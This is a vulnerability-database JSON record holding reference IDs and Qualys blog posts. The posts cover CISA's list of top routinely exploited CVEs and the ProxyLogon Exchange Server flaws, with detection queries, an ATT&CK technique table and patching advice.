"C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "C7CE5D12-A4E5-5FF2-9F07-CD5E84B4C02F", "C7F6FB3B-581D-53E1-A2BF-C935FE7B03C8", "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "CA7DF0EF-7032-54E3-B16E-D0845CE73845", "CF07CF32-0B8E-58E5-A410-8FA68D411ED0", "CF9EC818-A904-586C-9C19-3B4F04770FBD", "D178DAA4-01D0-50D0-A741-1C3C76A7D023", "D3C401E0-D013-59E2-8FFB-6BEF41DA3D1B", "DEC5B8BB-1933-54FF-890E-9C2720E9966E", "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "E9F25671-2BEF-5E8B-A60A-55C6DD9DE820", "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "F085F702-F1C3-5ACB-99BE-086DA182D98B", "F27B127B-57F0-5352-B92F-B6F921378CBB", "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD", "FACAC587-D738-561E-B976-3A97B6202667", "FB99D0AC-3747-583A-AE7D-EE0F4E626D66", "FC661572-B96B-5B2C-B12F-E8D279E189BF"]}, {"type": "hackerone", "idList": ["H1:1063256", "H1:1119224", "H1:1119228", "H1:632721"]}, {"type": "hivepro", "idList": ["HIVEPRO:0E3B824DCD3B82D06D8078A118E98B54"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20201105-01-NETLOGON"]}, {"type": "ibm", "idList": ["8190BE7075BCD3ECD99D09840619467A00B84599B985C4B2AB342389339984B1"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4416FB86A8069C419B8EAC9DBF52A644", "IMPERVABLOG:9DE0CE48F84BCF9764A6FA0372DB2AD1"]}, {"type": "kaspersky", "idList": ["KLA11139", "KLA11689", "KLA11692", "KLA11929", "KLA11931", "KLA12103"]}, {"type": "kitploit", "idList": ["KITPLOIT:5494076556436489947"]}, {"type": "krebs", "idList": ["KREBS:62E2D32C0ABD1C4B8EA91C60B425255B"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:78E91E28F51B0A15B6CA53FF8A9B480B", "MALWAREBYTES:7C9E5CAE3DDA4E673D38360AB2A5706B", "MALWAREBYTES:8AB104C08F6A4BE34498DA02C120E924"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/EXCHANGE_PROXYLOGON_COLLECTOR/", "MSF:AUXILIARY/SCANNER/HTTP/EXCHANGE_PROXYLOGON/", "MSF:EXPLOIT/UNIX/WEBAPP/DRUPAL_DRUPALGEDDON2", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882", 
"MSF:EXPLOIT/WINDOWS/HTTP/EXCHANGE_PROXYLOGON_RCE/", "MSF:EXPLOIT/WINDOWS/LOCAL/CVE_2020_0787_BITS_ARBITRARY_FILE_MOVE"]}, {"type": "mmpc", "idList": ["MMPC:D6D537E875C3CBD84822A868D24B31BA", "MMPC:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11882", "MS:CVE-2019-0604", "MS:CVE-2020-0787"]}, {"type": "mskb", "idList": ["KB2553204", "KB3162047", "KB4011262", "KB4011604", "KB4011618", "KB4462143"]}, {"type": "msrc", "idList": ["MSRC:5B84BD451283462DC81D4090EFE66280", "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09", "MSRC:ED939F90BDE8D7A32031A750388B03C9"]}, {"type": "mssecure", "idList": ["MSSECURE:C3D318931D83D536C01D2307EBC0B3B0", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891024", "MYHACK58:62201994299"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-1585.NASL", "ALA_ALAS-2021-1469.NASL", "CENTOS_RHSA-2020-5439.NASL", "DEBIAN_DLA-1325.NASL", "DEBIAN_DLA-2463.NASL", "DEBIAN_DSA-4156.NASL", "EULEROS_SA-2021-1050.NASL", "EULEROS_SA-2021-1118.NASL", "EULEROS_SA-2021-1517.NASL", "EULEROS_SA-2021-1533.NASL", "EULEROS_SA-2021-1625.NASL", "EULEROS_SA-2021-1635.NASL", "FEDORA_2018-922CC2FBAA.NASL", "FREEBSD_PKG_24ACE516FAD711EA8D8C005056A311D1.NASL", "FREEBSD_PKG_A9E466E8414411E8A29200E04C1EA73D.NASL", "GENTOO_GLSA-202012-24.NASL", "NEWSTART_CGSL_NS-SA-2021-0024_SAMBA.NASL", "OPENSUSE-2020-1526.NASL", "ORACLELINUX_ELSA-2020-5439.NASL", "REDHAT-RHSA-2020-5439.NASL", "SL_20201215_SAMBA_ON_SL7_X.NASL", "SMB_NT_MS20_MAR_4538461.NASL", "SMB_NT_MS20_MAR_4540670.NASL", "SMB_NT_MS20_MAR_4540673.NASL", "SMB_NT_MS20_MAR_4540681.NASL", "SMB_NT_MS20_MAR_4540688.NASL", "SMB_NT_MS20_MAR_4540689.NASL", "SMB_NT_MS20_MAR_4540693.NASL", "SMB_NT_MS20_MAR_4541506.NASL", "SMB_NT_MS20_MAR_4541509.NASL", "SMB_NT_MS20_MAR_4541510.NASL", "SMB_NT_MS21_FEB_4601347.NASL", "SMB_NT_MS21_MAR_EXCHANGE_2010_OOB.NASL", "SUSE_SU-2020-2719-1.NASL", "SUSE_SU-2020-2720-1.NASL", 
"SUSE_SU-2020-2721-1.NASL", "SUSE_SU-2020-2722-1.NASL", "SUSE_SU-2020-2724-1.NASL", "SUSE_SU-2020-2730-1.NASL", "UBUNTU_USN-4510-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704156", "OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209", "OPENVAS:1361412562310815788", "OPENVAS:1361412562310815789", "OPENVAS:1361412562310815790", "OPENVAS:1361412562310815791", "OPENVAS:1361412562310815792", "OPENVAS:1361412562310815793", "OPENVAS:1361412562310815796", "OPENVAS:1361412562310815797", "OPENVAS:1361412562310874382", "OPENVAS:1361412562310874383", "OPENVAS:1361412562310874421", "OPENVAS:1361412562310874422", "OPENVAS:1361412562310874428", "OPENVAS:1361412562310874456", "OPENVAS:1361412562310875500", "OPENVAS:1361412562310875534", "OPENVAS:1361412562310891325"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5439"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145226", "PACKETSTORM:147181", "PACKETSTORM:147182", "PACKETSTORM:147247", "PACKETSTORM:147392", "PACKETSTORM:158056", "PACKETSTORM:160127", "PACKETSTORM:161806", "PACKETSTORM:161846", "PACKETSTORM:161938", "PACKETSTORM:163810"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0"]}, {"type": "ptsecurity", "idList": ["PT-2020-01"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "QUALYSBLOG:D57DEDE8164E21BF8EE0C81B50AAA328"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:3A2793FB5315EE3613661543700B783B", "RAPID7BLOG:49C18614AD01B6865616A65F734B9F71", "RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:5D8768D89A817B5475C9FEA3577FB0BC", "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53", "RAPID7BLOG:C628D3D68DF3AE5A40A1F0C9DFA38860"]}, {"type": "redhat", "idList": ["RHSA-2021:3723"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-1472"]}, {"type": "saint", 
"idList": ["SAINT:192E33BC51A49F81EC3C52F0E8A72432", "SAINT:1AF7483E5B4DB373D9449DD910472EA5", "SAINT:420D07B85504086850EFAA31B8BCAEB5", "SAINT:C857C9B9FEF5E0F807DAAB797C3B2D87", "SAINT:E218D6FA073276BB012BADF2CCE50F0E"]}, {"type": "samba", "idList": ["SAMBA:CVE-2020-1472"]}, {"type": "securelist", "idList": ["SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:375240F06A95008FE7F1C49E97EEC5AF", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:5F58A2B6A05CED1E343735029CE88CC2", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:847981DCB9E90C51F963EE1727E40915", "SECURELIST:9CEE13B3A189B3DBB187C6946786F480", "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "SECURELIST:F1FC61836DCAA7F1E27411092B208523"]}, {"type": "seebug", "idList": ["SSV:97207"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1513-1"]}, {"type": "symantec", "idList": ["SMNTC-111238"]}, {"type": "talosblog", "idList": ["TALOSBLOG:7F660B8BF6BF1461DC91FBA38C034D9A", "TALOSBLOG:809E263C085A7EC5D9424905C6E4ACA8", "TALOSBLOG:A654303FB4331FDBB91B999EC882BE7A", "TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148"]}, {"type": "thn", "idList": ["THN:71D3B9379166BDEEAEC59EE5E145C193", "THN:814DFC4A310E0C39823F3110B0457F8C", "THN:8D76D821D51DF9AAAAF1C9D1FA8CA0C5", "THN:8E5D44939B2B2FF0156F7FF2D4802857", "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:9DB02C3E080318D681A9B33C2EFA8B73", "THN:ABF9BC598B143E7226083FE7D2952CAE", "THN:B0F0C0035DAAFA1EC62F15464A80677E", "THN:BC8A83422D35DB5610358702FCB4D154", "THN:C21D17F1D92C12B031AB9C761BBD004A", "THN:C473C49BA4C68CD048FB1E0B4A2D04F4", "THN:CBEFDC179819629DFFC0C17341BFD3E8", "THN:E9454DED855ABE5718E4612A2A750A98", 
"THN:EB3F9784BB2A52721953F128D1B3EAEC", "THN:ED087560040A02BCB1F68DE406A7F577", "THN:F03064A70C65D9BD62A8F5898BA276D2", "THN:F4928090525451C50A1B016ED3B0650F", "THN:F53D18B9EB0F8CD70C9289288AC9E2E1", "THN:F8EDB5227B5DA0E4B49064C2972A193D", "THN:FA40708E1565483D14F9A31FC019FCE1"]}, {"type": "threatpost", "idList": ["THREATPOST:0234DE925A24BDFF85D569B0592C4E40", "THREATPOST:056C552B840B2C102A6A75A2087CA8A5", "THREATPOST:0A40F95A480060B254A1AA6FCF9504B2", "THREATPOST:153B5C59C5DB1F87B3DFE2D673FA0030", "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "THREATPOST:1A7A6E9FF0F2A41A6A83EBDE0038383C", "THREATPOST:26EDD0A7C1914DBF0CFE32B0877BE5A7", "THREATPOST:27150C099FB4771B9DED4F6372D27EB7", "THREATPOST:2CE017994C889322A1BF0C3F3521DFD7", "THREATPOST:2D47D18D36043D4DFBFAD7C64345410E", "THREATPOST:30D70449EF03FFC5099B5B141FA079E2", "THREATPOST:3D545239C6AE58821904FBF3069CB365", "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "THREATPOST:45F91A2DD716E93AA4DA0D9441E725C6", "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "THREATPOST:49274446DFD14E2B0DF948DA83A07ECB", "THREATPOST:4A51D32AF6E154B536858044A8667E45", "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:816C2C5C3414F66AD1638248B7321FA1", "THREATPOST:88071AD0B76A2548D98F733D0DD3FE1A", "THREATPOST:937A7A291D84404C800DF20ADBE20BC1", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:9B936E81D7DD33C962D98A85BAF3B7FE", "THREATPOST:A1A1E1AC8DB384C8FA2988F9A9121141", "THREATPOST:A47D83D4BBBE115E6424755328525B9D", "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "THREATPOST:A5FC4C5797CA53E30A3426AF0843BFFE", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", 
"THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B62AA49BBB410F8D7406ABE4E3C4C62F", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:B956AABD7A9591A8F25851E15000B618", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BADA213290027D414693E838771F8645", "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "THREATPOST:BE68C6E4335F8D5EEAEFCE1E8553C4C8", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "THREATPOST:DC270F423257A4E0C44191BE365F25CB", "THREATPOST:E1CCA676B9815B84D887370ABFDEE020", "THREATPOST:EE5FF4DE95B4AED68C90DCB6444B6560", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F60D403369A535076F39A474F74C925E", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "THREATPOST:FADCF664C06E3747C40C200AE681FDF8"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1FEAB54A2EB3929007298481113A7219", "TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:8A87E8F1BA63B9BB2E84C23288C44FDC"]}, {"type": "ubuntu", "idList": ["USN-4510-1", "USN-4510-2", "USN-4559-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1472"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:115E09DAC149F2CA9466BA7550E0A5FE"]}, {"type": "zdi", "idList": ["ZDI-19-181"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022", "1337DAY-ID-30171", "1337DAY-ID-30199", "1337DAY-ID-30200", "1337DAY-ID-30268", "1337DAY-ID-33951"]}]}, "exploitation": null, "vulnersScore": -0.3}, "_state": {"dependencies": 1660032824, "score": 1660035404}, "_internal": {"score_hash": "40159287f205248acec0499758c726d3"}}
{"qualysblog": [{"lastseen": "2021-08-02T20:34:35", "description": "On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [cybersecurity advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>) detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.\n\nThe advisory states, \u201cIf an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems).\u201d\n\nCISA released the advisory in conjunction with the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI).\n\nThe CISA advisory is similar in scope to the October 2020 United States National Security Agency (NSA) [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) listing the top 25 known vulnerabilities being actively used by Chinese state-sponsored cyber actors [that security teams can detect and mitigate or remediate](<https://blog.qualys.com/product-tech/2020/10/22/nsa-alert-chinese-state-sponsored-actors-exploit-known-vulnerabilities>) in their infrastructure using Qualys VMDR.\n\n### Top Routinely Exploited Vulnerabilities\n\nHere is the list of top routinely exploited vulnerabilities in 2020 and 2021 along with affected products and associated Qualys VMDR QID(s) for each vulnerability.\n\n**CVE-IDs**| **Affected Products**| **Qualys Detections (QIDs)** \n---|---|--- \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065| Microsoft Exchange| 50107, 50108 \nCVE-2021-22893, 
CVE-2021-22894, CVE-2021-22899, CVE-2021-22900| Pulse Secure| 38838 \nCVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104| Accellion| 38830 \nCVE-2021-21985| VMware| 730102, 216261, 216260, 216259 \nCVE-2018-13379, CVE-2020-12812, CVE-2019-5591| Fortinet| 43702, 43769, 43825 \nCVE-2019-19781| Citrix| 150273, 372305, 372685 \nCVE-2019-11510| Pulse| 38771 \nCVE-2018-13379| Fortinet| 43702 \nCVE-2020-5902| F5 BIG-IP| 38791, 373106 \nCVE-2020-15505| MobileIron| 13998 \nCVE-2017-11882| Microsoft| 110308 \nCVE-2019-11580| Atlassian| 13525 \nCVE-2018-7600| Drupal| 371954, 150218, 277288, 176337, 11942 \nCVE-2019-18935| Telerik| 150299, 372327 \nCVE-2019-0604| Microsoft| 110330 \nCVE-2020-0787| Microsoft| 91609 \nCVE-2020-1472| Netlogon| 91688 \n \n### Detect CISA\u2019s Top Routinely Exploited Vulnerabilities using Qualys VMDR\n\nQualys released several remote and authenticated detections (QIDs) for the vulnerabilities. You can search for these QIDs in the VMDR Dashboard using the following QQL query:\n\nvulnerabilities.vulnerability.cveIds: [`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27065`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-21985`,`CVE-2018-13379`,`CVE-2020-12812`,`CVE-2019-5591`,`CVE-2019-19781`,`CVE-2019-11510`,`CVE-2018-13379`,`CVE-2020-5902`,`CVE-2020-15505`,`CVE-2017-11882`,`CVE-2019-11580`,`CVE-2019-18935`,`CVE-2019-0604`,`CVE-2020-0787`,`CVE-2020-1472`]\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize these vulnerabilities using the \u201cActive Attack\u201d RTI:\n\nWith the VMDR Dashboard, you can track the top 30 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. 
With trending enabled for dashboard widgets, you can keep track of trends for these vulnerabilities in your environment using the [\u201cCISA: Alert (AA21-209A) | Top Exploited\u201d dashboard](<https://success.qualys.com/support/s/article/000006738>).\n\n### Recommendations\n\nAs guided by CISA, organizations should do the following to protect assets from being exploited:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Organizations\u2019 vigilance teams should keep a close eye on indicators of compromise (IOCs) and maintain strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n * Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.\n * Focus cyber defense resources on patching those vulnerabilities that cyber actors most often use.\n\n### Remediation and Mitigation\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [_Qualys VMDR trial_](<https://www.qualys.com/subscriptions/vmdr/>) to automatically detect and mitigate or remediate the CISA top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, 
"impactScore": 6.0}, "published": "2021-07-29T00:20:27", "type": "qualysblog", "title": "CISA Alert: Top Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-5591", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T00:20:27", "id": "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-11T20:27:44", "description": "**Update March 10, 2021**: A new section describes how to respond with mitigation controls if patches cannot be applied, as recommended by Microsoft. This section details the Qualys Policy Compliance control ids for each vulnerability.\n\n**Update March 8, 2021**: Qualys has released an additional QID: 50108 which remotely detects instances of Exchange Server vulnerable to ProxyLogon vulnerability CVE-2021-26855 without authentication. 
QID 50108 is available in VULNSIGS-2.5.125-3 version and above, and is available across all platforms as of March 8th, 1:38 AM ET. This QID is not applicable to agents, so the signature version for the agent will not be updated. QID: 50107, released in VULNSIGS-2.5.121-4 and Windows Cloud Agent manifest 2.5.121.4-3 and above, will accurately detect this vulnerability via agents.\n\n**Original Post**: On March 2nd, [Microsoft released](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) a set of out-of-band security updates to address critical remote code execution vulnerabilities in Microsoft Exchange Server. According to Microsoft these vulnerabilities are actively being exploited in the wild, and hence it is recommended to patch them immediately.\n\nTo detect vulnerable instances, Qualys released QID 50107 which detects all vulnerable instances of Exchange server. This QID is included in VULNSIGS-2.5.121-4 version and above.\n\nCVEs addressed as part of this QID are: CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.\n\nAmong the above CVEs, [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) are being actively targeted in the wild using zero-day exploits. Microsoft attributes these attacks with high confidence to the HAFNIUM (Chinese cyber spy) threat actor group. 
These vulnerabilities affect the following versions of Exchange Server:\n\n * Exchange Server 2013\n * Exchange Server 2016\n * Exchange Server 2019\n\nAt the time of the security update release, the vulnerabilities affected only on-premises Microsoft Exchange Server installations. Exchange Online is not affected.\n\n### CVE Technical Details\n\n**[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>)** is a Server-Side Request Forgery (SSRF) vulnerability that allows attackers to send arbitrary HTTP requests and authenticate to on-premises Exchange servers. Attackers can also trick the Exchange server into executing arbitrary commands by exploiting this vulnerability.\n\n**[CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>)** is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization occurs when untrusted, user-controllable data is deserialized by a program. Attackers who successfully exploit this vulnerability can run their code as SYSTEM on the Exchange server. \n\n**[CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>)** is a post-authentication arbitrary file write vulnerability in Exchange. Exploiting this vulnerability could allow an attacker to write a file to any path on the target Exchange server.\n\n**[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>)** is a post-authentication arbitrary file write vulnerability in Exchange. Similar to CVE-2021-26858, exploiting this vulnerability could allow an attacker to write a file to any path on the target Exchange server.\n\n### Attack Chain\n\nMicrosoft has provided details regarding how the HAFNIUM threat actor group is exploiting the above-mentioned critical CVEs. 
The following sequence of steps summarizes Microsoft\u2019s findings.\n\n 1. The initial step in the attack chain is the threat actor group making an untrusted connection to the target Exchange server (on port 443) using CVE-2021-26855.\n 2. After successfully establishing the connection, the threat actor group exploits CVE-2021-26857, which gives them the ability to run code as SYSTEM on the target Exchange server. This requires administrator permission or another vulnerability to exploit.\n 3. As part of their post-authentication actions, the threat actor group exploits [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) and proceeds to write files to any path on the target server.\n\nIt has been observed that after gaining initial access, the threat actor group deployed web shells on the compromised target server.\n\nThe following table shows the MITRE ATT&CK Tactic and Technique details.\n\n**Tactic**| **Technique**| **Sub-Technique**| **TID** \n---|---|---|--- \nReconnaissance| Gather Victim Identity Information| Email Addresses| T1589.002 \nReconnaissance| Gather Victim Identity Information| IP Addresses| T1589.005 \nResource Development| Develop Capabilities| Exploits| T1587.004 \nInitial Access| Exploit Public-Facing Application| -| T1190 \nExecution| Command and Scripting Interpreter| PowerShell| T1059.001 \nPersistence| Create Account| Domain Account| T1136.002 \nPersistence| Server Software Component| Web Shell| T1505.003 \nCredential Access| OS Credential Dumping| LSASS Memory| T1003.001 \nCredential Access| OS Credential Dumping| NTDS| T1003.003 \nLateral Movement| Remote Services| SMB/Windows Admin Shares| T1201.002 \nCollection| Archive Collected Data| Archive via Utility| T1560.001 \nCollection| Email Collection| Remote Email Collection| T1114.002 \nCollection| Email Collection| Local Email Collection| T1114.001 \nCommand 
and Control| Remote Access Software| -| T1219 \nExfiltration| Exfiltration over Web Service| Exfiltration to Cloud Storage| T1567.002 \n \n### Discover and Remediate the Zero-Day Vulnerabilities Using Qualys VMDR\n\n##### Identify Microsoft Exchange Server Assets\n\nThe first step in managing these critical vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) makes it easy to identify Windows Exchange server systems.\n\nQuery: _operatingSystem.category:Server and operatingSystem.category1:`Windows` and software:(name:Microsoft Exchange Server)_\n\n\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, let\u2019s say \u2013 \u201cExchange Server 0-day\u201d. This helps in automatically grouping existing hosts with the 0-days as well as any new Windows Exchange server that spins up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\n##### Discover Exchange Server Zero-Day Vulnerabilities\n\nNow that hosts running Microsoft Exchange Server are identified, you want to detect which of these assets have flagged this vulnerability. 
VMDR automatically detects new vulnerabilities like these based on the always updated KnowledgeBase (KB).\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Exchange Server 0-day\u2019 asset tag in the vulnerabilities view by using this QQL query:\n\nVMDR query: `vulnerabilities.vulnerability.qid:50107`\n\n\n\nQID 50107 is available in signature version VULNSIGS-2.5.121-4 and above and can be detected using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.5.121.4-3 and above.\n\nQualys has released an additional QID: 50108 which remotely detects instances of Exchange Server vulnerable to ProxyLogon vulnerability CVE-2021-26855 without authentication. This QID is not applicable to agents. QID 50108 is available in VULNSIGS-2.5.125-3 version and above.\n\nOrganizations that use on-premises Exchange installations typically also enable Outlook Web Access (OWA), which is exposed to the internet to allow users to connect into their e-mail systems. It is therefore recommended organizations employ both remote and authenticated scanning methods to get the most accurate view of vulnerable assets, as using only the agent-based approach would not provide a comprehensive picture of the vulnerability exposure.\n\nWith VMDR Dashboard, you can track 'Exchange 0-day', impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the vulnerability trends in your environment using the Exchange Server 0-Day Dashboard.\n\n**Dashboard**: [Exchange Server 0-Day Dashboard | Critical Global View](<https://qualys-secure.force.com/customer/s/article/000006564>)\n\n\n\n##### Respond by Patching\n\nVMDR rapidly remediates the Windows hosts by deploying the most relevant and applicable per-technology version patches. 
